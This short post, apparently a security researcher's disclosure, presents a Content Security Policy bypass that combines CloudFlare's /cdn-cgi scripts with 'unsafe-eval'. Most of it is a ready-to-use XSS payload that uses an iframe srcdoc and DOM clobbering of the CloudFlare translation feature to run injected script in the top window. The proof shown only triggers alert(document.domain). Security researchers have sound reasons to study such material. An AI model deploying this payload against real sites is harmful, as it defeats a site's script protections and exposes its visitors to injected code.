CSP bypass via CloudFlare resources + 'unsafe-eval'
Update: This seems to have been a known trick. @cgvwzq🙇
XSS Payload:
<script src="/cdn-cgi/scripts/zepto.min.js"></script>
<div data-translate="value"></div>
<iframe name="_cf_translation" srcdoc="
<script src='/cdn-cgi/scripts/zepto.min.js'></script>
<a id='_cf_translation' name='locale'>If it works well, this text will be copied to top window <script>alert(document.domain)</script></a>
<a id='_cf_translation'></a>
<img name='blobs' id='lang-selector'>
<script src='/cdn-cgi/scripts/cf.common.js'></script>
"></iframe>
<script src="/cdn-cgi/scripts/cf.common.js?{random}"></script>